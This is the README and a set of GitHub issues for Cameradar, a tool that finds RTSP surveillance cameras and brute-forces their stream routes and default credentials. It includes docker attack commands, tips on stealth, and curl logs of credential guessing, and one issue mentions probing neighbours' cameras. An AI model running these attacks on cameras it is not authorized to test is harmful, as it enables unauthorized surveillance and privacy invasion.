Cameradar hacks its way into RTSP videosurveillance cameras


Coverage Status

An RTSP stream access tool that comes with its library

Cameradar allows you to

  • Detect open RTSP hosts on any accessible target host
  • Detect which device model is streaming
  • Launch automated dictionary attacks to get their stream route (e.g.: /live.sdp)
  • Launch automated dictionary attacks to get the username and password of the cameras
  • Retrieve a complete and user-friendly report of the results

Table of content

Docker Image for Cameradar

Install docker on your machine, and run the following command:

docker run -t ullaakut/cameradar -t <target> <other command-line options>

See command-line options.

e.g.: docker run -t ullaakut/cameradar -t will scan the ports 554, 5554 and 8554 of hosts on the subnetwork and attack the discovered RTSP streams and will output debug logs.

  • YOUR_TARGET can be a subnet (e.g.:, an IP (e.g.:, or a range of IPs (e.g.:
  • If you want to get the precise results of the nmap scan in the form of an XML file, you can add -v /your/path:/tmp/cameradar_scan.xml to the docker run command, before ullaakut/cameradar.
  • If you use the -r and -c options to specify your custom dictionaries, make sure to also use a volume to add them to the docker container. Example: docker run -t -v /path/to/dictionaries/:/tmp/ ullaakut/cameradar -r /tmp/myroutes -c /tmp/mycredentials.json -t mytarget

Installing the binary on your machine

Only use this solution if for some reason using docker is not an option for you or if you want to locally build Cameradar on your machine.


Steps to install

  1. go get
  2. cd $GOPATH/src/
  3. cd cmd/cameradar
  4. go install

The cameradar binary is now in your $GOPATH/bin ready to be used. See command line options here.


The RTSP port used for most cameras is 554, so you should probably specify 554 as one of the ports you scan. Not specifying any ports to the cameradar application will scan the 554, 5554 and 8554 ports.

docker run -t --net=host ullaakut/cameradar -p "18554,19000-19010" -t localhost will scan the ports 18554, and the range of ports between 19000 and 19010 on localhost.

You can use your own files for the credentials and routes dictionaries used to attack the cameras, but the Cameradar repository already gives you a good base that works with most cameras, in the /dictionaries folder.

docker run -t -v /my/folder/with/dictionaries:/tmp/dictionaries \
           ullaakut/cameradar \
           -r "/tmp/dictionaries/my_routes" \
           -c "/tmp/dictionaries/my_credentials.json" \

This will put the contents of your folder containing dictionaries in the docker image and will use it for the dictionary attack instead of the default dictionaries provided in the cameradar repo.

Check camera access

If you have VLC Media Player, you should be able to use the GUI or the command-line to connect to the RTSP stream using this format: rtsp://username:password@address:port/route

Command-line options

  • "-t, --targets": Set target. Required. Target can be a file (see instructions on how to format the file), an IP, an IP range, a subnetwork, or a combination of those. Example: --targets=","
  • "-p, --ports": (Default: 554,5554,8554) Set custom ports.
  • "-s, --scan-speed": (Default: 4) Set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. You might also want to keep it low to keep your discovery stealthy. See this for more info on the nmap timing templates.
  • "-I, --attack-interval": (Default: 0ms) Set custom interval after which an attack attempt without an answer should give up. It's recommended to increase it when attempting to scan unstable and slow networks or to decrease it on fast and reliable networks.
  • "-T, --timeout": (Default: 2000ms) Set custom timeout value after which an attack attempt without an answer should give up. It's recommended to increase it when attempting to scan unstable and slow networks or to decrease it on fast and reliable networks.
  • "-r, --custom-routes": (Default: <CAMERADAR_GOPATH>/dictionaries/routes) Set custom dictionary path for routes
  • "-c, --custom-credentials": (Default: <CAMERADAR_GOPATH>/dictionaries/credentials.json) Set custom dictionary path for credentials
  • "-o, --nmap-output": (Default: /tmp/cameradar_scan.xml) Set custom nmap output path
  • "-d, --debug": Enable debug logs
  • "-v, --verbose": Enable verbose curl logs (not recommended for most use)
  • "-h": Display the usage information

Format input file

The file can contain IPs, hostnames, IP ranges and subnetwork, separated by newlines. Example:

Environment Variables


This variable is mandatory and specifies the target that cameradar should scan and attempt to access RTSP streams on.


  • localhost
  • 192.168.2-3.0-255


This variable is optional and allows you to specify the ports on which to run the scans.

Default value: 554,5554,8554

It is recommended not to change these except if you are certain that cameras have been configured to stream RTSP over a different port. 99.9% of cameras are streaming on these ports.


This variable is optional and allows you to specify on which file nmap will write its output.

Default value: /tmp/cameradar_scan.xml

This can be useful only if you want to read the files yourself, if you don't want it to write in your /tmp folder, or if you want to use only the RunNmap function in cameradar, and do its parsing manually.


These variables are optional, allowing to replace the default dictionaries with custom ones, for the dictionary attack.

Default values: <CAMERADAR_GOPATH>/dictionaries/routes and <CAMERADAR_GOPATH>/dictionaries/credentials.json


This optional variable allows you to set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a fast and reliable network. See this for more info on the nmap timing templates.

Default value: 4


This optional variable allows you to set custom interval to wait between each attack in order to stay stealthy. It's recommended to increase it when attempting to scan a network that might be protected against bruteforce attacks. By default, there is no interval, in order to make attacks as fast as possible

Default value: 0ms


This optional variable allows you to set custom timeout value after which an attack attempt without an answer should give up. It's recommended to increase it when attempting to scan unstable and slow networks or to decrease it on fast and reliable networks.

Default value: 2000ms


This optional variable allows you to enable a more verbose output to have more information about what is going on.

It will output nmap results, cURL requests, etc.

Default: false



Docker build

To build the docker image, simply run docker build -t . cameradar in the root of the project.

Your image will be called cameradar and NOT ullaakut/cameradar.

Go build

  1. go get
  2. cd $GOPATH/src/
  3. cd cmd/cameradar
  4. go install

The cameradar binary is now in $GOPATH/bin/cameradar.

Frequently Asked Questions

Cameradar does not detect any camera!

That means that either your cameras are not streaming in RTSP or that they are not on the target you are scanning. In most cases, CCTV cameras will be on a private subnetwork, isolated from the internet. Use the -t option to specify your target. If you are sure you did everything right but it still does not work, please open an issue with details on the device you are trying to access 🙏

Cameradar detects my cameras, but does not manage to access them at all!

Maybe your cameras have been configured, and the credentials / URL have been changed. Cameradar only guesses using default constructor values if a custom dictionary is not provided. You can use your own dictionaries in which you just have to add your credentials and RTSP routes. To do that, see how the configuration works. Also, maybe your camera's credentials are not yet known, in which case if you find them it would be very nice to add them to the Cameradar dictionaries to help other people in the future.

What happened to the C++ version?

You can still find it under the 1.1.4 tag on this repo, however it was slower and less stable than the current version written in Golang. It is not recommended using it.

How to use the Cameradar library for my own project?

See the example in /cmd/cameradar. You just need to run go get and to use the cameradar package in your code. You can find the documentation on godoc.

I want to scan my own localhost for some reason, and it does not work! What's going on?

Use the --net=host flag when launching the cameradar image, or use the binary by running go run cameradar/cameradar.go or installing it.

I don't see a colored output:(

You forgot the -t flag before ullaakut/cameradar in your command-line. This tells docker to allocate a pseudo-tty for cameradar, which makes it able to use colors.

I don't have a camera, but I'd like to try Cameradar!

Simply run docker run -p 8554:8554 -e RTSP_USERNAME=admin -e RTSP_PASSWORD=12345 -e RTSP_PORT=8554 ullaakut/rtspatt and then run cameradar, and it should guess that the username is admin and that the password is 12345. You can try this with any default constructor credentials (they can be found here).

What authentication types does Cameradar support?

Cameradar supports both basic and digest authentication.


Running cameradar on your own machine to scan for default ports

docker run --net=host -t ullaakut/cameradar -t localhost

Running cameradar with an input file, logs enabled on port 8554

docker run -v /tmp:/tmp --net=host -t ullaakut/cameradar -t /tmp/test.txt -p 8554

Running cameradar on a subnetwork with custom dictionaries, on ports 554, 5554 and 8554

docker run -v /tmp:/tmp --net=host -t ullaakut/cameradar -t --custom-credentials="/tmp/dictionaries/credentials.json" --custom-routes="/tmp/dictionaries/routes" -p 554,5554,8554


Copyright 2019 Ullaakut

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.


Brendan Le Glaunec
Software Engineer @traefik & previously R&D Software Engineer @EtixLabs / Go Contractor @fresh8
Brendan Le Glaunec
  • Unable to detect auth type

    Unable to detect auth type

    The auth type in source code is

    • 0 for None
    • 1 for basic auth
    • 2 for digest auth

    But when I run cameradar (I use docker image), it's not able to identify the auth type

    This is the log

     (auth -1): curl: RTSP CSeq mismatch or invalid CSe
  • The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm/v7)

    The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm/v7)

    First, make sure that none of the open and closed issues is about the same issue as you are describing, and make sure to check the frequently asked questions in the README file. Then, replace the parts of this template that are between with the data relative to your issue.

    If you're reporting a bug, use the template below. Otherwise, delete this template and write your issue normally.


    Please select one:

    • [x] I use the docker image ullaakut/cameradar
    • [ ] I use my own build of the docker image
    • [ ] I use the pre-compiled binary
    • [ ] I use my own build of the binary
    • [ ] None of the above / I don't know

    Please select one:

    • [ ] I use a specific version:
    • [x] I use the latest commit of the master branch
    • [ ] I use the latest commit of the develop branch
    • [ ] I use a forked version of the repository:
    • [ ] I use a specific commit:


    My operating system:

    • [ ] Windows
    • [ ] OSX
    • [x] Linux
    • [ ] Other

    OS version: Raspbian OS architecture: arm


    I am trying to run this on a Raspberry Pi, but when I execute the command docker run --net=host -t ullaakut/cameradar -t localhost I get this error:

    WARNING: The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm/v7) and no specific platform was requested
    standard_init_linux.go:219: exec user process caused: exec format error

    What was expected

    Image should run

    What happened



    If your issue is with Cameradar's binary or docker image, please run it with -v to print verbose logs, and paste them here:

    WARNING: The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm/v7) and no specific platform was requested
    standard_init_linux.go:219: exec user process caused: exec format error
  • Digest authentication no longer works

    Digest authentication no longer works


    Both binary and docker releases

    Any commit since digest authentication was added


    Any OS


    Making any requests with digest authentication causes the following issue:

    *   Trying
    * TCP_NODELAY set
    * Connected to ( port 8554 (#0)
    * Server auth using Digest with user 'ubnt'
    > DESCRIBE rtsp://ubnt:[email protected]:8554/live.sdp RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    < RTSP/1.0 401 Unauthorized
    < CSeq: 1
    < WWW-Authenticate: Digest realm="GStreamer RTSP Server", nonce="3034e78651e4e61e"
    < Server: GStreamer RTSP server
    < Date: Sun, 12 Jan 2020 09:36:53 GMT
    * Connection #0 to host left intact
    * Issue another request to this URL: 'rtsp://ubnt:[email protected]:8554/live.sdp'
    * Protocol "rtsp" not supported or disabled in libcurl
    * Closing connection -1

    * Protocol "rtsp" not supported or disabled in libcurl

    While when using basic authentication or no authentication, streams are accessed without any issue, and this log never appears.

  • Can't access camera with custom route

    Can't access camera with custom route

    Issue from @johny77g ( )

    Hi, I exposed my camera for a simple test with very simple setup username: admin, password: admin. Updated credentials.json and routes as below. With option -l the generated connections were following:

    DESCRIBE rtsp://:@x.x.x.x:x/tcp/av0_0 RTSP/1.0 (no usr and no login)
    DESCRIBE rtsp://:@x.x.x.x:x/udp/av0_0 RTSP/1.0 (no usr and no login)
    DESCRIBE rtsp://admin:[email protected]:/ RTSP/1.0 (no command from routes)

    BUT the right configuration was never generated. (I mean with: admin, admin, tcp/av0_0) Is it something wrong with my trial or some issue with attack.go file?

    "usernames": [
    "passwords" : [
  • Attack requests dropped

    Attack requests dropped

    When performing the attack (on my own network I get errors for the following Attacking routes of # streams...ok

    Perform failed: curl: RTSP CSeq mismatch or invalid CSeq Perform failed: curl: Failure from receiving data from the peer Attempting to detect authentication of # of streams...ok Perform failed: curl: Failure from receiving data from the peer Attacking credentials of # streams ...ok Perform failed: curl: RTSP CSeq mismatch or invalid CSeq Perform failed: curl: Failure from receiving data from the peer Validating that streams are accessible...ok Perform failed: curl: Failure from receiving data from the peer

    My question is are these normal error messages or did I mess up the installation?

  • Cameradar is not giving result properly

    Cameradar is not giving result properly

    Im using Cameradar from past 6 months it working fine but now i thing its having some issues with it. Im testing with RTSP IP having open port and also having default credentials which are present in dictionary Folder but it shows "Unable to attack empty list of targets " and when i open my rtsp link with default credentials in VLC it's working. so, i think there have some problem Cameradar. Please help me out. cam1

    Please select one:

    • [* ] I use the docker image ullaakut/cameradar **
    • [ ] I use my own build of the docker image
    • [ ] I use the pre-compiled binary
    • [ ] I use my own build of the binary
    • [ ] None of the above / I don't know


    My operating system:

    • [ ] Windows
    • [ ] OSX
    • [* ] Linux
    • [ ] Other

    OS version: <ubuntu 16.04 > OS architecture: <64 bit>

  • Timeouts during attack on IP Webcam android phone app

    Timeouts during attack on IP Webcam android phone app

    hi i have setup my android phone as my camera using the app called "IP Webcam", just to make sure that the camera is running i did a nmap scan to make sure the port is open as well like below:

    PORT STATE SERVICE 5554/tcp open sgi-esphttp MAC Address: 4C:77:41:43:A6:CD (Lenovo)

    than i ran the command:

    sudo docker run -t ullaakut/cameradar -t -l and also this sudo docker run --net=host -t ullaakut/cameradar -t

    both commands outputs the same: ✖ No streams were found. Please make sure that your target is on an accessible network.

    my android phone is on the same network, i can access the camera through the browser, but cameradar cannot seem to find it.

    any suggestions?

  • CURL Timeout Error - Debian Stretch (9.3) (aarch64) (Android chrooted env)

    CURL Timeout Error - Debian Stretch (9.3) (aarch64) (Android chrooted env)


    First of all, I wanted to thank you for working on and maintaining such an interesting project. Looking forward to further releases and updates :).

    To keep it short. I recently stumbled upon cameradar while trying to build the perfect IoT pentesting environment on Android. Unfortunately however, I've faced some problems while trying to run it on my current environment. Here's my current scenario:

    After setting up a chrooted Debian environment on Android (8.0 Oreo) and setting up golang and the necessary compilation build tools, the compiled binary somehow gets confused when invoking libcurl functions. Here's precisely what happens while trying to run cameradar on the above mentioned environment

    (You'll have to excuse me but I didn't manage to find an easier way of sharing a screenshot )

    Basically, curl tries to connect to (rtsp://%user:%password:%macaddr/%route)

    I already tried debugging the binary through strace thinking that it was invoking curl through execv but to no avail.

    I still didn't manage to find out where the error culprit stands (libcurl invoked with erroneus parameters or simply libcurl failure)

    Hopefully you'll manage to find some time and look into it.

    Thanks in advance :)


  • Implement digest authentication

    Implement digest authentication

    First, make sure that none of the open and closed issues is about the same issue as you are describing, and make sure to check the frequently asked questions in the README file. Then, replace the parts of this template that are between with the data relative to your issue.

    If you're reporting a bug, use the template below. Otherwise, delete this template and write your issue normally.


    Please select one:

    • [x] I use the docker image ullaakut/cameradar
    • [ ] I use my own build of the docker image
    • [ ] I use the pre-compiled binary
    • [ ] I use my own build of the binary
    • [ ] None of the above / I don't know

    Please select one:

    • [ ] I use a specific version:
    • [x] I use the latest commit of the master branch
    • [ ] I use the latest commit of the develop branch
    • [ ] I use a forked version of the repository:
    • [ ] I use a specific commit:


    My operating system:

    • [ ] Windows
    • [ ] OSX
    • [x] Linux
    • [ ] Other

    OS version: Ubuntu 18.04 OS architecture: 64bit Intel


    401 Unauthorized from the camera

    What was expected?

    Successful connection

    What happened?

    Hello, I love this project! I am trying to figure out why it isn't working against an Aiphone camera. Below are the logs. The camera is at default with user/pass of aiphone/aiphone.

    I read the FAQ and a previous issue titled "can't detect camera feed". Both were very useful but I still can't figure out what I am doing wrong. Can you give me some tips to help troubleshoot? Thanks!

    If I copy this line from the logs and put it in vlc I get the stream: rtsp://aiphone:[email protected]:554/udp/unicast/aiphone_H264

    Here is the command I used to run Docker. docker run -t -v /home/mhubbard/Dropbox/03_Tools:/tmp/dictionaries ullaakut/cameradar -r "/tmp/dictionaries/rtsp.txt" -c "/tmp/dictionaries/my_credentials.json" -t -l

    Here are the files in /home/mhubbard/Dropbox/03_Tools




      "usernames": [
      "passwords" : [


    If your issue is with Cameradar's binary or docker image, please run it with -l to print logs, and paste them here:

    ->docker run -t -v /home/mhubbard/Dropbox/03_Tools:/tmp/dictionaries ullaakut/cameradar -r "/tmp/dictionaries/rtsp.txt" -c "/tmp/dictionaries/my_credentials.json"  -t -l
    * Expire in 0 ms for 6 (transfer 0xd90300)
    * Expire in 2000 ms for 8 (transfer 0xd90300)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xd90300)
    * Connected to ( port 554 (#0)
    > DESCRIBE rtsp://:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNDk3Mzk6NzQ3NTQ0OTk5"
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xd9d060)
    * Expire in 2000 ms for 8 (transfer 0xd9d060)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xd9d060)
    * Connected to ( port 554 (#0)
    > DESCRIBE rtsp://:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTExMjg6MTk5OTQ0OTk="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xda9bc0)
    * Expire in 2000 ms for 8 (transfer 0xda9bc0)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xda9bc0)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user ''
    > DESCRIBE rtsp://:[email protected]:554/udp/unicast/aiphone_H264 RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic OmFpcGhvbmU=
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTE3NDg6MTI3NTc3ODU0Mw=="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xdb6760)
    * Expire in 2000 ms for 8 (transfer 0xdb6760)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xdb6760)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user ''
    > DESCRIBE rtsp://:[email protected]:554/udp/unicast/aiphone_H264 RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic OlYzY3Qwcjg4
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTI0NDI6MTUyMDY5MDU1OA=="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xdc3300)
    * Expire in 2000 ms for 8 (transfer 0xdc3300)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xdc3300)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user 'aiphone'
    > DESCRIBE rtsp://aiphone:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic YWlwaG9uZTo=
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTMwNDg6MTkyMTI5MTY="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xdcfea0)
    * Expire in 2000 ms for 8 (transfer 0xdcfea0)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xdcfea0)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user 'aiphone'
    > DESCRIBE rtsp://aiphone:[email protected]:554/udp/unicast/aiphone_H264 RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic YWlwaG9uZTphaXBob25l
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTM2Mzk6NTQ1OTExMzQz"
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xddca80)
    * Expire in 2000 ms for 8 (transfer 0xddca80)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xddca80)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user 'aiphone'
    > DESCRIBE rtsp://aiphone:[email protected]:554/udp/unicast/aiphone_H264 RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic YWlwaG9uZTpWM2N0MHI4OA==
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTQzNTE6MTY1ODg2MDUwOQ=="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xde9660)
    * Expire in 2000 ms for 8 (transfer 0xde9660)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xde9660)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user 'admin'
    > DESCRIBE rtsp://admin:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic YWRtaW46
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTQ5NTU6MTk3MjEyMzA1Ng=="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xdf6200)
    * Expire in 2000 ms for 8 (transfer 0xdf6200)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xdf6200)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user 'admin'
    > DESCRIBE rtsp://admin:[email protected]:554/udp/unicast/aiphone_H264 RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic YWRtaW46YWlwaG9uZQ==
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTU1MzU6MTc4NDM2MDIyNg=="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xe02de0)
    * Expire in 2000 ms for 8 (transfer 0xe02de0)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xe02de0)
    * Connected to ( port 554 (#0)
    * Server auth using Basic with user 'admin'
    > DESCRIBE rtsp://admin:[email protected]:554/udp/unicast/aiphone_H264 RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    Authorization: Basic YWRtaW46VjNjdDByODg=
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTYwODk6MzI4MDMxMDQ1"
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xe0f9c0)
    * Expire in 2000 ms for 8 (transfer 0xe0f9c0)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xe0f9c0)
    * Connected to ( port 554 (#0)
    > DESCRIBE rtsp://:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTY4NjY6MTc2NDgyNDU2OQ=="
    * Connection #0 to host left intact
    * Expire in 0 ms for 6 (transfer 0xd8a920)
    * Expire in 2000 ms for 8 (transfer 0xd8a920)
    *   Trying
    * TCP_NODELAY set
    * Expire in 200 ms for 4 (transfer 0xd8a920)
    * Connected to ( port 554 (#0)
    > SETUP rtsp://:@ RTSP/1.0
    CSeq: 1
    Transport: RTP/AVP;unicast;client_port=33332-33333
    < RTSP/1.0 401 Unauthorized
    < Server: Linux/ Ze-PRO
    < CSeq: 1
    < WWW-Authenticate: Digest realm="Secret", nonce="ODQ4MDguNTc0NjE6MTA1MDcxOTk0Nw=="
    * Connection #0 to host left intact
    ✖	Admin panel URL: You can use this URL to try attacking the camera's admin panel instead.
    	Device model:		
    	Available:		✖
    	IP address:
    	RTSP port:		554
    	Username:		not found
    	Password:		not found
    	RTSP route:		/udp/unicast/aiphone_H264
    ✖ Streams were found but none were accessed. They are most likely configured with secure credentials and routes. You can try adding entries to the dictionary or generating your own in order to attempt a bruteforce attack on the cameras.
  • No package 'libcurl' found

    No package 'libcurl' found

    When running:

    go get

    I get

    # pkg-config --cflags libcurl
    Package libcurl was not found in the pkg-config search path.
    Perhaps you should add the directory containing `libcurl.pc'
    to the PKG_CONFIG_PATH environment variable
    No package 'libcurl' found
    pkg-config: exit status 1

    Should I install libcurl ? If so, which one ? :/ Is it one related to GO language ?

    sudo apt-cache search libcurl
    libcurl3-gnutls - easy-to-use client-side URL transfer library (GnuTLS flavour)
    libcurl3-nss - easy-to-use client-side URL transfer library (NSS flavour)
    libcurl4-doc - documentation for libcurl
    libcurl4-gnutls-dev - development files and documentation for libcurl (GnuTLS flavour)
    libcurl4-nss-dev - development files and documentation for libcurl (NSS flavour)
    libcurl4-openssl-dev - development files and documentation for libcurl (OpenSSL flavour)
    libstrongswan-extra-plugins - strongSwan utility and crypto library (extra plugins)
    python-pycurl - Python bindings to libcurl
    python-pycurl-dbg - Python bindings to libcurl (debug extension)
    python-pycurl-doc - Python bindings to libcurl (documentation)
    python3-pycurl - Python bindings to libcurl (Python 3)
    python3-pycurl-dbg - Python bindings to libcurl (debug extension, Python 3)
    libcurl4 - easy-to-use client-side URL transfer library (OpenSSL flavour)
    fp-units-net - Free Pascal - networking units dependency package
    fp-units-net-3.0.4 - Free Pascal - networking units
    libcupt4-2-downloadmethod-curl - flexible package manager -- libcurl download method
    libcurl-ocaml - OCaml curl bindings (Runtime Library)
    libcurlpp-dev - c++ wrapper for libcurl (development files)
    libcurlpp0 - c++ wrapper for libcurl
    libghc-curl-dev - GHC libraries for the libcurl Haskell bindings
    libghc-curl-doc - Documentation for the libcurl Haskell bindings; documentation
    libghc-curl-prof - Profiling libraries for the libcurl Haskell bindings; profiling libraries
    libghc-hxt-curl-dev - LibCurl interface for HXT
    libghc-hxt-curl-doc - LibCurl interface for HXT; documentation
    libghc-hxt-curl-prof - LibCurl interface for HXT; profiling libraries
    libjsonrpccpp-client0 - library implementing json-rpc C++ clients
    libjsonrpccpp-client0-dbg - debugging symbols for libjsonrpccpp-client0
    libresource-retriever-dev - Robot OS resource_retriever library - development files
    libresource-retriever0d - Robot OS resource_retriever library
    libulfius-dev - Web Framework for REST Applications in - development
    libwww-curl-perl - Perl bindings to libcurl
    lua-curl - libcURL bindings for the Lua language
    lua-curl-dev - libcURL development files for the Lua language
    python-resource-retriever - Robot OS resource_retriever library - Python
    ruby-curb - Ruby libcurl bindings
    ruby-ethon - libcurl wrapper using ffi
    ruby-typhoeus - parallel HTTP library on top of ethon
    tclcurl - Tcl bindings to libcurl
    wmget - Background download manager in a Window Maker dock app
    libcurl-ocaml-dev - OCaml libcurl bindings (Development package)
    libcurl-openssl1.0-dev - development files and documentation for libcurl (OpenSSL 1.0 flavour)
    libcurl3 - easy-to-use client-side URL transfer library (OpenSSL flavour)
    libulfius2.2 - Web Framework for REST Applications in C
    r-cran-crul - simple HTTP Client for GNU R
  • Improve route and credential detection by issuing RTSP SETUP Request

    Improve route and credential detection by issuing RTSP SETUP Request

    Hey @Ullaakut :)

    So I was testing some cameras around my neighbourhood and noticed something weird. Cameradar bases it's results on the response it gets from a RTSP DESCRIBE request and so far so good, it works and everything. The problem IMO Is that cameradar never checks to make sure the stream is actually available. This time I'm proposing a detection mechanism enhancement by issuing a second RTSP SETUP request and, thus validating that the credentials and route are actually accessible. Consider the following scenario

    cameradar -t -T 5000 -l Output

    root@localhost:~# cameradar -t -T 5000 -l
    command: nmap -T4 -A -p 554,8554 -oX /tmp/cameradar_scan.xml
    Starting Nmap 7.40 ( ) at 2018-07-06 08:30 CEST
    Nmap scan report for
    Host is up (0.014s latency).
    554/tcp  open   rtsp
    | fingerprint-strings:
    |   FourOhFourRequest:
    |     RTSP/1.0 505 RTSP Version Not Supported
    |     Server: ALi feng/2.1.0_rc1
    |     Date: Week 4, 1 Mon0 0070 22:12:16 GMT
    |   GetRequest:
    |     RTSP/1.0 505 RTSP Version Not Supported
    |     Server: ALi feng/2.1.0_rc1
    |     Date: Week 4, 1 Mon0 0070 22:12:01 GMT
    |   HTTPOptions:
    |     RTSP/1.0 505 RTSP Version Not Supported
    |     Server: ALi feng/2.1.0_rc1
    |     Date: Week 4, 1 Mon0 0070 22:12:11 GMT
    |   RTSPRequest:
    |     RTSP/1.0 400 Bad Request
    |     Server: ALi feng/2.1.0_rc1
    |     Date: Week 4, 1 Mon0 0070 22:12:06 GMT
    |   SIPOptions:
    |     RTSP/1.0 505 RTSP Version Not Supported
    |     Server: ALi feng/2.1.0_rc1
    |_    Date: Week 4, 1 Mon0 0070 22:12:21 GMT
    8554/tcp closed rtsp-alt
    1 service unrecognized despite returning data. If you know the service/ver
    sion, please submit the following fingerprint at
    submit.cgi?new-service :
    MAC Address: 50:00:07:00:32:84 (Unknown)
    No exact OS matches for host (If you know what OS is running on it, see ht
    tps:// ).
    TCP/IP fingerprint:
    Network Distance: 1 hop
    1   13.58 ms
    OS and Service detection performed. Please report any incorrect results at .
    Nmap done: 1 IP address (1 host up) scanned in 52.88 seconds
    *   Trying
    * TCP_NODELAY set
    * Connected to ( port 554 (#0)
    > DESCRIBE rtsp://:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    < RTSP/1.0 400 Bad Request
    < CSeq: 1
    < Server: ALi feng/2.1.0_rc1
    < Date: Week 4, 1 Mon0 0070 22:12:43 GMT
    * Curl_http_done: called premature == 0
    * Connection #0 to host left intact
    *   Trying
    * TCP_NODELAY set
    * Connected to ( port 554 (#0)
    > DESCRIBE rtsp://:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
    < RTSP/1.0 200 OK
    < CSeq: 1
    < Server: ALi feng/2.1.0_rc1
    < Content-Type: application/sdp
    < Content-Base: rtsp://:@
    < Date: Week 4, 1 Mon0 0070 22:12:43 GMT
    < Content-Length: 226
    o=- 2209068544 2209068544 IN IP4
    s=RTSP Session
    c=IN IP4
    t=0 0
    a=tool:ALi feng 2.1.0_rc1 Streaming Server
    m=video 0 RTP/AVP 33
    * Curl_http_done: called premature == 0
    * Connection #0 to host left intact
    *   Trying
    * TCP_NODELAY set
    * Connected to ( port 554 (#0)
    > DESCRIBE rtsp://:@ RTSP/1.0
    CSeq: 1
    Accept: application/sdp
